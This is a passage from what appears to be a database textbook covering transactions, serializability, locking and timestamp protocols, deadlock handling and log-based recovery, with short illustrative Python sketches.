A transaction must be in one of the following states:
• Active - the initial state; the transaction stays in this state while it is executing.
• Partially committed - after the final statement has been executed but before it is committed.
• Failed - after the discovery that normal execution can no longer proceed.
• Aborted - after the transaction has been rolled back and the database has been restored to its state prior to the start of the transaction.
• Committed - after successful completion.
A transaction enters the failed state when the system determines that the transaction
cannot proceed with normal execution because of hardware or logical errors. Such a transaction
must be rolled back and it enters the aborted state.
At this point, the system can restart the transaction [only hardware or software error] or
kill the transaction [only for internal logical error].
6.2. SCHEDULES
A schedule is a sequence of instructions that specifies the chronological order in which the instructions of the transactions are executed. Schedules are of two types: serial schedules and concurrent schedules. In a serial schedule, a transaction is executed fully and only then does the next transaction start its execution. But in a concurrent schedule, there is interleaving of instructions, i.e., a part of one transaction is executed, followed by some part of another transaction, and so on. The concurrent execution of transactions improves throughput and resource
utilization and reduces waiting time. A schedule for a set of transactions should contain all the
instructions of all those transactions and should preserve the order in which the instructions
appear in each individual transaction. A transaction that successfully completes its execution
will have commit as the last statement whereas a transaction that fails will have an abort
instruction.
Example:
Let T1 and T2 be two transactions in a schedule. Transaction T1 transfers Rs.50 from Account A to Account B, and T2 transfers 10% of the balance from Account A to Account B.
If the transactions are executed one at a time, T2 followed by T1, then the execution
sequence in the Schedule 2 is as shown below in the Figure 6.3.
The following Schedule 3 is concurrent schedule (Figure 6.4), in which the execution
of statements in T1 and T2 are interleaved. The first 3 statements in T1 are executed first, then
four statements in T2 followed by four statements in T1 and remaining three from T2.
Not all concurrent schedules are equivalent to a serial schedule. For example, the following concurrent Schedule 4 in Figure 6.5 does not preserve the value of (A + B). After the execution of this schedule, the final values of accounts A and B are Rs.950 and Rs.2100 respectively. The sum of A and B is Rs.3050, which is inconsistent. Hence Schedule 4 is not serializable.
6.3. SERIALIZABILITY
1. Conflict serializability
2. View serializability
Let us consider only read and write instructions and ignore other instructions for
explaining the concept of serializability.
Example:
Schedule 3 in Figure 6.6 shows only read and write operations of concurrent schedule
in Figure 6.4. The write(A) instruction of T1 conflicts with the read(A) instruction of T2.
However, the write(A) instruction of T2 does not conflict with the read(B) instruction of T1,
because the two instructions access different data items.
The final result of these swaps, schedule 5 of Figure 6.7, is a serial schedule. Note that
schedule 5 is exactly the same as schedule 1, but it shows only the read and write instructions.
Thus, we have shown that Schedule 3 is equivalent to a serial schedule. If a schedule S can be
transformed into a schedule S’ by a series of swaps of non conflicting instructions, we say that
S and S’ are conflict equivalent.
The below schedule 6 in Figure 6.8 is not conflict serializable, because we cannot swap the
instructions Write(Q) in transaction T3 with Write(Q) in transaction T4 to obtain either the serial
schedule < T3, T4 >, or the serial schedule < T4, T3 >.
Let S and S' be two schedules with the same set of transactions, and let Q be a data item accessed by the transactions. The schedules S and S' are said to be view equivalent if the following three conditions are met for each data item Q:
1. If transaction Ti reads the initial value of Q in schedule S, then Ti must also read the initial value of Q in schedule S'.
2. If transaction Ti reads a value of Q that was written by transaction Tj in schedule S, then Ti must also read the value of Q written by Tj in schedule S'.
3. The transaction (if any) that performs the final write(Q) operation in schedule S must also perform the final write(Q) operation in schedule S'.
The Schedule 8 shown in Figure 6.10 produces the same result as that of the serial
schedule < T1, T5 >, even though it is not conflict equivalent or view equivalent. Determining
such type of equivalence requires analysis of all other operations in addition to read and write.
If a precedence graph is acyclic, then the serializability order can be obtained by a topological sort of the graph. This is a linear order consistent with the partial order of the graph. In Figure 6.12 below, (b) and (c) are two possible topological orderings of (a).
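A minimal Python sketch of conflict-serializability testing is given below: it builds the precedence graph from conflicting operations and, if the graph is acyclic, obtains an equivalent serial order by topological sorting. The schedule shown is an illustrative two-transaction example, not one of the numbered schedules in the figures.

from graphlib import TopologicalSorter, CycleError

def precedence_graph(schedule):
    edges = {}
    for i, (ti, op1, x) in enumerate(schedule):
        for tj, op2, y in schedule[i + 1:]:
            # two operations conflict if they belong to different transactions,
            # access the same item, and at least one of them is a write
            if ti != tj and x == y and "W" in (op1, op2):
                edges.setdefault(tj, set()).add(ti)   # edge ti -> tj (ti must precede tj)
    return edges

schedule = [("T1", "R", "A"), ("T1", "W", "A"), ("T2", "R", "A"), ("T2", "W", "A"),
            ("T1", "R", "B"), ("T1", "W", "B"), ("T2", "R", "B"), ("T2", "W", "B")]
try:
    order = list(TopologicalSorter(precedence_graph(schedule)).static_order())
    print("conflict serializable, equivalent serial order:", order)   # ['T1', 'T2']
except CycleError:
    print("not conflict serializable")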
The precedence graph used to determine conflict serializability cannot be used directly to test for view serializability, because the extension needed to test view serializability has a cost exponential in the size of the precedence graph. In fact, the problem of determining whether a schedule is view serializable falls in the class of NP-complete problems. However, there exist algorithms that check certain sufficient conditions for view serializability.
• If any transaction executes successfully, then in almost all database systems, by default
every SQL statement commits implicitly. Implicit commit can be turned off by a
database directive
• Isolation level can be set at database level and it can be set at start of transaction
• But if any transaction holds an exclusive lock on an item, no other transaction is permitted to hold any lock (either shared or exclusive) on that item.
Example:
The Transaction T1 transfers Rs.50 from Account B to Account A and the Transaction T2
displays the sum of Account A and Account B.
T1:lock-X(B);
read(B);
B := B − 50;
write(B);
unlock(B);
lock-X(A);
read(A);
A := A + 50;
write(A);
unlock(A)
T2:lock-S(A);
read (A);
unlock(A);
lock-S(B);
read (B);
unlock(B);
display(A+B)
A locking protocol is a set of rules followed by all transactions while requesting and
releasing locks. The Locking protocols enforce serializability. The following schedule shows
the requests made by the Transactions T1 and T2 to lock/unlock the data items A and B and the
permission granted by the concurrency-control manager.
Suppose that the amounts in Accounts A and B are Rs.100 and Rs.200, respectively. If these two transactions are executed serially, either in the order T1, T2 or the order T2, T1, then transaction T2 will display the value Rs.300. However, if these transactions are executed concurrently, then schedule 1 in Figure 7.2 is possible. In this case, transaction T2 displays Rs.250, which is incorrect. The reason for this mistake is that transaction T1 unlocked data item B too early, as a result of which T2 saw an inconsistent state.
The schedule shows the actions executed by the transactions, as well as the points at
which the concurrency-control manager grants the locks. The transaction making a lock request
cannot execute its next action until the concurrency control manager grants the lock.
Suppose now that unlocking is delayed to the end of the transaction. Transaction T3
corresponds to T1 with unlocking delayed and Transaction T4 corresponds to T2 with unlocking
delayed. The sequence of reads and writes in schedule 1, which lead to an incorrect total of
Rs.250 is no longer possible with T3.
T3:lock-X(B);
read(B);
B := B − 50;
write(B);
lock-X(A);
read(A);
A := A + 50;
write(A);
unlock(B);
unlock(A).
T4:lock-S(A);
read(A);
lock-S(B);
read(B);
display(A + B);
unlock(A);
unlock(B).
When deadlock occurs, the system must roll back one of the two transactions. Once a
transaction has been rolled back, the data items that were locked by that transaction are
unlocked. These data items are then available to the other transaction, which can continue with
its execution
When a transaction Ti requests a lock on a data item Q in a particular mode M, the concurrency-control manager grants the lock provided that:
1. There is no other transaction holding a lock on Q in a mode that conflicts with M.
2. There is no other transaction that is waiting for a lock on Q and that made its lock request before Ti.
Two Phase locking protocol is a protocol which ensures that the schedules are conflict
serializable. There are two phases in two phase locking protocol – Growing Phase and Shrinking
Phase.
Lock point is a point where a transaction has acquired its final lock in the growing phase.
Two-phase locking does not ensure that the schedule is free from deadlock. In order to ensure
recoverability and avoid cascading roll-backs, extension of basic two-phase locking namely
Strict two-phase locking is required.
In a Strict two-phase locking, a transaction must hold all its exclusive locks till it
commits/aborts. There is a variation of Strict two-phase locking, Rigorous two-phase locking
in which a transaction must hold all locks till commit/abort.
The locks can be converted from shared to exclusive and vice versa. In Growing Phase
of a Two-phase locking protocol, a transaction can acquire a lock-S or lock-X. Lock conversion
can also be made to convert a lock-S to a lock-X which is termed as upgrade. Similarly, in a
Shrinking Phase, a transaction can release a lock-S or lock-X or convert a lock-X to a lock-S
which is downgrade.
Consider the following two transactions T8 and T9, for which only some of the significant read and write operations are shown:
T8:
read(a1);
read(a2);
...
read(an);
write(a1).
T9:
read(a1);
read(a2);
display(a1 + a2).
If we employ the two-phase locking protocol, then T8 must lock a1 in exclusive mode. Therefore, any concurrent execution of both transactions amounts to a serial execution. However, T8 needs an exclusive lock on a1 only at the end of its execution, when it writes a1. Thus, if T8 could initially lock a1 in shared mode and later change the lock to exclusive mode, we could get more concurrency, since T8 and T9 could access a1 and a2
simultaneously. Figure 7.4 shows the schedule with a lock conversion.
Appropriate lock and unlock instructions are automatically generated on the basis of the read and write requests from the transaction:
• When Ti issues a read(Q) operation, the system issues a lock-S(Q) instruction followed by the read(Q) instruction.
• When Ti issues a write(Q) operation, the system checks to see whether Ti already holds
a shared lock on Q. If it does, then the system issues an upgrade(Q) instruction, followed
by the write(Q) instruction. Otherwise, the system issues a lock-X(Q) instruction,
followed by the write(Q) instruction.
• All locks obtained by a transaction are unlocked after that transaction commits or aborts.
Transactions can send lock or unlock requests as messages to lock manager. The lock
manager decides whether to grant the lock or not based on the lock – compatibility. In case of
a deadlock, the lock manager may ask the transaction to roll back. The requesting transaction
should wait until it gets reply from the lock manager. The lock manager maintains an in-memory
data-structure called a lock table to record the details about the granted locks and pending
requests. A sample lock table is shown in the following Figure 7.5.
Dark blue squares indicate granted locks whereas light blue colored ones indicate
waiting requests. A new request is added to the end of the queue of requests for the data item, and is granted only if it is compatible with all earlier granted locks on the data item. When a transaction sends a request to unlock a data item, the request record is deleted, and later
requests are checked to see if they can now be granted. If a transaction aborts, all waiting or
granted requests of the transaction are deleted. To implement this efficiently, the lock manager
keeps a list of locks held by each transaction.
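The following Python sketch shows a highly simplified lock-table entry: a per-item queue of granted and waiting requests, where a new request is granted only if it is compatible with every request already in the queue. It illustrates only the data structure, not a full lock manager.

from collections import defaultdict

COMPATIBLE = {("S", "S"): True, ("S", "X"): False,
              ("X", "S"): False, ("X", "X"): False}

class LockTable:
    def __init__(self):
        self.queues = defaultdict(list)          # data item -> [(txn, mode, granted)]

    def request(self, txn, item, mode):
        queue = self.queues[item]
        ok = all(COMPATIBLE[(held, mode)] for _, held, granted in queue if granted)
        ok = ok and all(granted for _, _, granted in queue)   # earlier waiters also block
        queue.append((txn, mode, ok))
        return ok

    def release(self, txn, item):
        self.queues[item] = [r for r in self.queues[item] if r[0] != txn]
        # a full implementation would now re-examine the waiting requests

locks = LockTable()
print(locks.request("T1", "A", "S"))   # True  - shared lock granted
print(locks.request("T2", "A", "S"))   # True  - compatible with T1's shared lock
print(locks.request("T3", "A", "X"))   # False - must wait for T1 and T2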
Each transaction Ti is issued a unique timestamp TS(Ti) when it enters the system.
Newer transactions are assigned with timestamps greater than earlier ones. Timestamp could be
based on a logical counter or wall-clock time. In timestamp-based protocols time-stamp order
is same as that of serializability order.
Timestamp-based protocols impose a set of rules on read and write operations to ensure that any conflicting operations are executed in timestamp order; out-of-order operations cause the issuing transaction to be rolled back.
1. If TS(Ti) < W-timestamp(Q), then Ti needs to read a value of Q that was already
overwritten by some other transaction and hence, the read operation is rejected, and Ti
is rolled back.
1. If TS(Ti) < R-timestamp(Q), then the value of Q that Ti is producing was needed
previously and hence, the write operation is rejected, and Ti is rolled back.
Example
In presenting schedules under the timestamp protocol, we shall assume that a transaction is assigned a timestamp immediately before its first instruction. Thus, in the schedule shown, TS(T25) < TS(T26), and the schedule is possible under the timestamp protocol.
1. If TS(Ti) < R-timestamp(Q), then the value of Q that Ti is producing was previously
needed, and it had been assumed that the value would never be produced. Hence, the
system rejects the write operation and rolls Ti back.
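A compact Python sketch of these timestamp-ordering checks is shown below; each data item carries an R-timestamp and a W-timestamp, and an out-of-order operation is reported as a rollback.

class Item:
    def __init__(self):
        self.r_ts = 0   # largest timestamp of any successful read
        self.w_ts = 0   # timestamp of the last successful write

def ts_read(ts, item):
    if ts < item.w_ts:                        # needed value already overwritten
        return "rollback"
    item.r_ts = max(item.r_ts, ts)
    return "read ok"

def ts_write(ts, item):
    if ts < item.r_ts or ts < item.w_ts:      # a later transaction already read or wrote Q
        return "rollback"
    item.w_ts = ts
    return "write ok"

Q = Item()
print(ts_write(10, Q))   # write ok
print(ts_read(5, Q))     # rollback - TS(Ti) < W-timestamp(Q)
print(ts_read(15, Q))    # read ok
print(ts_write(12, Q))   # rollback - TS(Ti) < R-timestamp(Q)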
7.5 MULTIVERSION
• Multiversion schemes keep old versions of data item to increase concurrency. Several
variants of multiversion schemes are:
o Snapshot isolation
o Each successful write results in the creation of a new version of the data item
written.
Each data item Q has a sequence of versions <Q1, Q2, ..., Qm>. Each version Qk contains three data fields:
• Content - the value of version Qk.
• W-timestamp(Qk) - the timestamp of the transaction that created version Qk.
• R-timestamp(Qk) - the largest timestamp of any transaction that successfully read version Qk.
Suppose that transaction Ti issues a read(Q) or write(Q) operation. Let Qk denote the
version of Q whose write timestamp is the largest write timestamp <= TS(Ti).
➢ Update transactions:
▪ Perform rigorous two-phase locking - hold all locks up to the end of the transaction.
▪ When an item is to be read, it gets a shared lock on the item, and reads the latest
version of that item.
▪ When an item is to be written, it gets an exclusive lock on the item, and then creates
a new version of the data item.
▪ When the transaction completes its actions, it carries out commit processing
➢ Read-only transactions:
▪ When a transaction Ti issues a read(Q), the value returned is the contents of the
version whose timestamp is the largest timestamp less than or equal to TS(Ti).
▪ The read-only transactions that start after Ti increments ts-counter will see the
values updated by Ti , whereas those that start before Ti increments ts-counter will
see the value before the updates by Ti . In either case, read-only transactions never
need to wait for locks.
Versions are deleted in a manner like that of multiversion timestamp ordering. Suppose
there are two versions, Qk and Qj , of a data item, and that both versions have a
timestamp less than or equal to the timestamp of the oldest read-only transaction in the
system. Then, the older of the two versions Qk and Qj will not be used again and can be
deleted.
In Snapshot isolation, a transaction is given a snapshot of the database at the time when
it begins its execution. It then operates on that snapshot in complete isolation from other
concurrent transactions. The data values in the snapshot consist only of values written by
committed transactions. This isolation is ideal for read-only transactions since they never wait
and are never aborted by the concurrency manager.
Deciding whether or not to allow an update transaction to commit requires some care.
Two transactions running concurrently might both update the same data item. Since these two
transactions operate in isolation using their own private snapshots, neither transaction sees the
update made by the other. If both transactions are allowed to write to the database, the first
update written will be overwritten by the second. The result is a lost update which can be
prevented by two variants of snapshot isolation - first committer wins and first updater wins.
Under first committer wins, when a transaction T enters the partially committed state,
the following actions are taken:
• A test is made to see whether any transaction that was concurrent with T has already written an update to the database for some data item that T intends to write.
• If some such transaction is found, then T aborts.
• If no such transaction is found, then T commits and its updates are written to the database.
This approach is called first committer wins because if transactions conflict, the first
one to be tested using the above rule succeeds in writing its updates, while the subsequent ones
are forced to abort.
Under first updater wins the system uses a locking mechanism that applies only to
updates. When a transaction Ti attempts to update a data item, it requests a write lock on that
data item. If the lock is not held by a concurrent transaction, the following steps are taken after
the lock is acquired:
• If the item has been updated by any concurrent transaction, then Ti aborts.
• Otherwise, Ti may proceed with its execution, including possibly committing.
If, however, some other concurrent transaction Tj already holds a write lock on that data
item, then Ti cannot proceed and the following rules are followed:
• If Tj aborts, then the lock is released and Ti can obtain the lock. After the lock is
acquired, the check for an update by a concurrent transaction is performed as described
earlier: Ti aborts if a concurrent transaction had updated the data item, and proceeds
with its execution otherwise.
• If Tj commits, then Ti must abort. Locks are released when the transaction commits or
aborts.
This approach is called first updater wins because if transactions conflict, the first one
to obtain the lock is the one that is permitted to commit and perform its update while the
subsequent ones are to be aborted.
The validation-based protocol, also called optimistic concurrency control, commits the transactions in serialization order. To do so, each transaction passes through the following phases:
1. Read and execution phase: Transaction Ti writes only to temporary local variables and not to the database.
2. Validation phase: Transaction Ti performs a validation test to determine whether the local variables holding the results of its writes can be copied to the database without violating serializability.
3. Write phase: If no violation is found in the validation phase, the updates are applied to the database; otherwise, Ti is rolled back.
In a concurrent schedule, the three phases of different transactions can be interleaved, but each transaction must go through the three phases in the above order. For simplicity, we can assume that the validation and write phases occur together.
Validation tests use the above timestamps and the read/write sets to ensure that the serializability order is determined by the validation time, i.e., TS(Ti) = ValidationTS(Ti). For all Ti with TS(Ti) < TS(Tj), validation succeeds if either Ti completes its write phase before Tj starts its read phase, or Ti completes its write phase before Tj starts its validation phase and Tj does not read any data item written by Ti. Otherwise, validation fails and Tj is aborted. If the probability of conflicts is low, then
the Validation-based protocol provides greater degree of concurrency when compared with
locking or Time Stamp Ordered protocol. Example of schedule produced using validation is
given in Figure 7.6.
Multiple granularity locking allows data items to be of various sizes and defines a hierarchy of data granularities, where the smaller granularities are nested within larger ones. The hierarchy can be represented as a tree, and when a transaction locks a node in the tree explicitly, it implicitly locks all the node's descendants in the same mode. Locks have to be acquired from the root towards the leaves, whereas they have to be released from the leaves towards the root. If there are too many locks at a particular level, the system can switch to a coarser-granularity S or X lock; this is termed lock granularity escalation.
There are two types of granularity of locking which specifies the level in the tree where
locking is done:
• Fine granularity (lower in tree)
▪ high concurrency
▪ high locking overhead
• Coarse granularity (higher in tree)
▪ low concurrency
▪ low locking overhead
Example of Granularity Hierarchy is given in Figure 7.7. The levels, starting from the
coarsest (top) level are
• database
• area
• file
• record
In addition to S and X lock modes, there are three additional lock modes with multiple
granularity:
• intention-shared (IS): indicates explicit locking at a lower level of the tree, but only with shared locks.
• intention-exclusive (IX): indicates explicit locking at a lower level with exclusive or shared locks.
• shared and intention-exclusive (SIX): the subtree rooted by that node is locked explicitly in shared mode, and explicit locking is being done at a lower level with exclusive-mode locks.
Intention locks allow a higher level node to be locked in S or X mode without having to
check all descendent nodes.
The compatibility matrix for all lock modes is shown in Figure 7.8:
In this schedule, neither T3 nor T4 can make progress. The reason is that T3 has locked data item B in exclusive mode, and T4's request for a shared lock on B causes T4 to wait for T3 to release its lock on B. Similarly, T3 waits for T4 to release its lock on A. Such a situation is called a deadlock, and to handle the deadlock either T3 or T4 must be rolled back and its locks released.
Imagine a situation in which T1 has locked a data item X in shared mode and T2 needs to acquire an exclusive lock on X, so T2 waits for T1 to release its lock. Meanwhile, other transactions may request shared locks on the same item, and these can be granted since the item is locked only in shared mode; T2 may therefore never get its turn. A transaction may also be repeatedly chosen as a deadlock victim and rolled back. Such situations lead to starvation, and the concurrency-control manager should be designed to prevent starvation.
Deadlock prevention protocols ensure that the system will never enter into a deadlock
state. Some prevention strategies:
• Require that each transaction locks all its data items before it begins execution.
• Impose partial ordering of all data items and require that a transaction can lock data
items only in the order specified by the partial order.
There are two approaches in deadlock prevention. One approach ensures that all the
required locks are acquired together so that no cyclic waits can occur. The other approach is
closer to deadlock recovery, and performs transaction rollback instead of waiting for a lock.
The simplest scheme under the first approach requires that each transaction locks all the
required data items before it begins execution. Either all are locked in one step or none are
locked. There are two main disadvantages to this protocol:
(1) It is often hard to predict what data items need to be locked, before the transaction
begins.
(2) data-item utilization may be very low because many data items may be locked but
unused for a long time.
The second approach for preventing deadlocks is to impose an ordering of all data items
and the transaction can lock data items only in a sequence mentioned in the ordering.
Once a transaction has locked a particular item, it cannot request locks on items that precede that item in the ordering. This scheme is easy to implement only when the data items to be accessed by a transaction are known at the beginning of its execution.
Based on a counter or on the system clock, a unique timestamp is assigned to each transaction when it begins. The system uses these timestamps to decide whether a transaction should wait or roll back. If a transaction is rolled back, it retains its old timestamp when restarted. Two different deadlock-prevention schemes using timestamps have been proposed.
a. wait-die
wait-die is a non-preemptive scheme. If the requesting transaction is older, it may wait for the younger one to release the lock on the data item. But if the requesting transaction is younger, it never waits for the older transaction to release the lock; instead, it is rolled back (it "dies"). The drawback is that a transaction may die several times before acquiring a lock.
b. wound-wait
wound-wait is a preemptive scheme. If the requesting transaction is older than the one holding the lock, it wounds (forces the rollback of) the younger transaction; if the requesting transaction is younger, it waits for the older transaction to release the lock.
In both schemes, a rolled back transaction is restarted with its original timestamp and
ensures that older transactions have precedence over newer ones, and starvation is thus
avoided.
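The two decisions can be summarized in a small Python sketch, assuming that smaller timestamps denote older transactions and that the requester asks for a lock currently held by the holder.

def wait_die(requester_ts, holder_ts):
    # non-preemptive: only an older requester is allowed to wait
    return "wait" if requester_ts < holder_ts else "rollback requester (die)"

def wound_wait(requester_ts, holder_ts):
    # preemptive: an older requester wounds (rolls back) the younger holder
    return "rollback holder (wound)" if requester_ts < holder_ts else "wait"

print(wait_die(5, 10))     # wait                      - older waits for younger
print(wait_die(10, 5))     # rollback requester (die)  - younger is rolled back
print(wound_wait(5, 10))   # rollback holder (wound)   - older preempts younger
print(wound_wait(10, 5))   # wait                      - younger waits for older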
In timeout-based schemes, a transaction waits for a lock only for a specified amount of time, after which the transaction is rolled back. The timeout scheme is simple to implement and ensures that deadlocks get resolved by the timeout. But it may roll back transactions unnecessarily even in the absence of deadlock, and it is difficult to determine a good value for the timeout interval. Starvation is also possible.
Fig. 7.10 (a) Wait-for graph without a cycle (b) Wait-for graph with a cycle
After the detection of deadlock, some transaction will have to be rolled back (made a
victim) in order to break deadlock cycle.
▪ Partial rollback: Roll back victim transaction only as far as necessary to release
locks that another transaction in cycle is waiting for
Starvation may happen during deadlock recovery, and a solution is to ensure that the oldest transaction in the deadlock set is never chosen as the victim.
CHAPTER – VIII
RECOVERY
A computer system may be subject to failure due to a disk crash, power outage, software error, or a fire in the machine room, and information may be lost. The database system must take actions in advance to ensure the atomicity and durability properties of transactions. A recovery scheme can restore the database to the consistent state that existed before the failure. The recovery scheme must also provide high availability, i.e., minimize the time for which the database is not usable after a failure. Recovery algorithms have two parts:
i. Actions taken during normal transaction processing to ensure that enough information exists to allow recovery from failures.
ii. Actions taken after a failure to recover the database contents to a state that ensures consistency, atomicity and durability.
8.1.2 Storage
The various data items in the database may be stored and accessed in a number of
different storage media. There are three categories of storage:
▪ Stable storage
▪ Volatile storage
▪ Nonvolatile storage
Stable storage plays a critical role in recovery algorithms. To implement stable storage,
we need to replicate the needed information in several nonvolatile storage media (usually disk)
with independent failure modes, and to update the information in a controlled manner to ensure
that failure during data transfer does not damage the needed information. Block transfer
between memory and disk storage can result in:
• Successful completion: The transferred information arrived safely at its destination.
• Partial failure: A failure occurred during transfer, and the destination block has incorrect
information.
• Total failure: The failure occurred sufficiently early during the transfer that the
destination block remains intact.
We require that, if a data-transfer failure occurs, the system detects it and invokes a
recovery procedure to restore the block to a consistent state. To do so, the system must maintain
two physical blocks for each logical database block. In the case of mirrored disks, both blocks
are at the same location and in the case of remote backup, one of the blocks is local, whereas
the other is at a remote site. An output operation is executed as follows:
1. Write the information onto the first physical block.
2. When the first write completes successfully, write the same information onto the
second physical block.
3. The output is completed only after the second write completes successfully.
If the system fails while blocks are being written, it is possible that the two copies of a
block are inconsistent with each other. During recovery, for each block, the system would need
to examine two copies of the blocks. If both are the same and no detectable error exists, then no
further actions are necessary. But if the system detects an error in one block, then it replaces
its content with the content of the other block. If both blocks contain no detectable error, but
they differ in content, then the system replaces the content of the first block with the value of
the second. This recovery procedure ensures that a write to stable storage either succeeds completely (that is, updates all copies) or results in no change.
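A rough Python sketch of the two-copy output and recovery rule is shown below; a CRC checksum stands in for the "detectable error" test, and a two-element list stands in for the two physical blocks.

import zlib

def write_block(copies, data):
    copies[0] = (data, zlib.crc32(data))     # step 1: write the first physical block
    copies[1] = (data, zlib.crc32(data))     # step 2: write the second block only afterwards

def recover_block(copies):
    # compare the two copies and repair them using the rule described above
    valid = [c for c in copies if c is not None and zlib.crc32(c[0]) == c[1]]
    if len(valid) == 2 and valid[0][0] != valid[1][0]:
        copies[0] = copies[1]                # both error-free but different: keep the second
    elif len(valid) == 1:
        copies[0] = copies[1] = valid[0]     # one copy damaged: replace it with the good one
    return copies[0][0] if valid else None

copies = [None, None]
write_block(copies, b"balance=950")
print(recover_block(copies))                 # b'balance=950'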
Each transaction Ti has a private work area in which copies of data items accessed and
updated by Ti are kept. The system creates this work area when the transaction is initiated and
removes it when the transaction either commits or aborts. Each data item X kept in the work
area of transaction Ti is denoted by xi. Transaction Ti interacts with the database system by
transferring data to and from its work area to the system buffer using these two operations:
1. read(X) assigns the value of data item X to the local variable xi. It executes as follows: if the block BX on which X resides is not in main memory, it issues input(BX); it then assigns to xi the value of X from the buffer block.
2. write(X) assigns the value of local variable xi to data item X in the buffer block. It executes as follows: if the block BX on which X resides is not in main memory, it issues input(BX); it then assigns the value of xi to X in buffer BX.
A buffer block is eventually written out to the disk either because the buffer manager
needs the memory space for other purposes or because the database system wishes to reflect the
change to B on the disk. The database system performs a force-output of buffer B if it issues an
output(B).
When a transaction needs to access a data item X for the first time, it must execute
read(X). The system then performs all updates to X on xi . At any point during its execution a
transaction may execute write(X) to reflect the change to X in the database itself.
The output(BX) operation for the buffer block BX on which X resides does not need to
take effect immediately after write(X) is executed, since the block BX may contain other data
items that are still being accessed. The actual output may take place later. If the system crashes
after the write(X) operation was executed but before output (BX) was executed, the new value
of X is never written to disk and, thus, is lost.
Consider a transaction Ti that transfers Rs.50 from account A to account B, with initial
values of A and B being Rs.1000 and Rs.2000, respectively. Suppose that a system crash has
occurred during the execution of Ti , after output(BA) has taken place, but before output(BB)
was executed, where BA and BB denote the buffer blocks on which A and B reside.
When the system restarts, the value of A would be Rs.950, while that of B would be Rs.2000, which is clearly inconsistent with the atomicity requirement for transaction Ti. Unfortunately,
there is no way to find out by examining the database state what blocks had been output, and
what had not, before the crash.
To achieve our goal of atomicity, we must first output to stable storage information
describing the modifications, without modifying the database itself. This information can help
us ensure that all modifications performed by committed transactions are reflected in the
database during recovery.
The most widely used structure for recording the modifications done in a database is the
log. The log is a sequence of log records, recording all the update activities in the database.
There are several types of log records. An update log record describes a single database write.
It has these fields:
• Transaction identifier - the unique identifier of the transaction that performed the write
operation.
• Data-item identifier - the unique identifier of the data item written. Typically, it is the
location on disk of the data item with the block identifier of the block and an offset
within the block.
• Old value - the value of the data item prior to the write.
• New value - the value that the data item will have after the write.
The update log record is represented as <Ti, Xj , V1, V2>, indicating that transaction Ti
has performed a write on data item Xj . Xj had value V1 before the write, and has value V2 after
the write. There are special log records to record significant events during transaction
processing.
Whenever a transaction performs a write, the log record for that write will be created
and added to the log before the database is modified. Once a log record exists, we can output the modification to the database. We also have the ability to undo a modification, by using the old-value field in the log record.
For log records to be useful for recovery from system and disk failures, the log must
reside in stable storage. For now, we assume that every log record is written to the end of the
log on stable storage as soon as it is created.
A transaction creates a log record before modifying the database. The log records allow
the system to undo changes, if the transaction must be aborted. Similarly, they allow the system
to redo the changes, if the transaction has committed but the system crashed before those
changes are stored in the database on disk. The steps in modifying a data item are:
1. The transaction performs some computations in its own private part of main memory.
2. The transaction modifies the data block in the disk buffer in main memory holding the
data item.
3. The database system executes the output operation that writes the data block to disk.
There are two types of database modification techniques – deferred and immediate.
o Output of updated blocks to disk can take place at any time before or after
transaction commit
o Order in which blocks are output can be different from the order in which they
are written.
o But has overhead, since the transactions need to make local copies of all
updated data items
• The possibility that a transaction may have committed although some of its database
modifications exist only in the disk buffer in main memory and not in the database
on disk.
• The possibility that a transaction may have modified the database while in the active
state and, as a result of a subsequent failure, may need to abort.
Because all database modifications must be preceded by the creation of a log record, the
system has available both the old value prior to the modification of the data item and the
new value that is to be written for the data item. This allows the system to perform undo
and redo operations as appropriate.
• Undo using a log record sets the data item specified in the log record to the old
value.
• Redo using a log record sets the data item specified in the log record to the new
value.
Imagine a situation in which transaction T1 has modified a data item X and the
concurrency control scheme permits another transaction T2 to modify X before T1 commits. If
undo operation is done in T1 (which restores the old value of X) , then the undo operation should
be done in T2 also. In order to avoid this situation, recovery algorithms require that if a data
item has been modified by a transaction, no other transaction can modify the data item until the
first transaction commits or aborts.
This requirement can be satisfied by using strict two-phase locking, in which the exclusive lock acquired on any updated data item is held until the transaction commits. Snapshot-isolation and validation-based concurrency-control techniques also hold the acquired exclusive locks until the transaction commits.
A transaction is said to be committed, when its commit log record, (the last log record)
has been written to stable storage. At that point all the previous log records have already been
output to stable storage. If there is a system crash, then the updates of the transaction can be
redone. If the system crash occurs before a log record < Ti commit> is output to stable storage,
then the transaction Ti will be rolled back.
Let us see how the log can be used to recover from a system crash, and to roll back
transactions during normal operation. Consider a transaction T0 is a transaction which transfers
Rs.50 from account A to account B. Initial balance in A is 1000 and B is 2000.
T0: read(A);
A := A-50;
write(A);
read(B);
B := B + 50;
write(B).
Let T1 be a transaction that withdraws Rs.100 from account C. The initial balance in account C is Rs.700.
T1: read(C);
C := C-100;
write(C).
The portion of the log which contains the relevant information with respect to the
transactions T0 and T1 is shown below.
<T0 start>
<T0, A, 1000, 950>
<T0, B, 2000, 2050>
<T0 commit>
<T1 start>
<T1, C, 700, 600>
<T1 commit>
A possible order in which the actual outputs took place in both the database system and
the log as a result of the execution of T0 and T1 is shown below.
Log                              Database
<T0 start>
<T0, A, 1000, 950>
<T0, B, 2000, 2050>
                                 A = 950
                                 B = 2050
<T0 commit>
<T1 start>
<T1, C, 700, 600>
                                 C = 600
<T1 commit>
Using the log, the system can handle any failure other than the loss of information in
nonvolatile storage. The recovery scheme uses two recovery procedures redo(Ti) and undo(Ti).
• redo(Ti) sets the value of all data items updated by transaction Ti to the new values. The
order in which updates are carried out by redo is important. When recovering from a
system crash, if updates to a particular data item are applied in an order different from
the order in which they were applied originally, the final state of that data item will have
a wrong value.
• undo(Ti ) restores the value of all data items updated by transaction Ti to the old values.
The undo operation not only restores the data items to their old value, but also writes
log records to record the updates performed as part of the undo process. These log
records are special redo-only log records, since they do not need to contain the old-value
of the updated data item.
Similar to redo procedure, the order in which undo operations are performed is
important. When the undo operation for transaction Ti completes, it writes a <Ti abort> log
record, indicating that the undo has completed.
After a system crash has occurred, the system consults the log to determine which
transactions need to be redone, and which need to be undone so as to ensure atomicity.
• Transaction Ti needs to be undone if the log contains the record <Ti start>, but does not
contain either the record <Ti commit> or the record <Ti abort>.
• Transaction Ti needs to be redone if the log contains the record <Ti start> and either the
record <Ti commit> or the record <Ti abort>.
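The rule above can be sketched in Python as a single scan of the log that classifies each transaction for redo or undo; the sample log mirrors the banking example that follows.

def classify(log):
    started, finished = set(), set()
    for record in log:
        txn, event = record[0], record[1]
        if event == "start":
            started.add(txn)
        elif event in ("commit", "abort"):
            finished.add(txn)
    return started & finished, started - finished   # (redo set, undo set)

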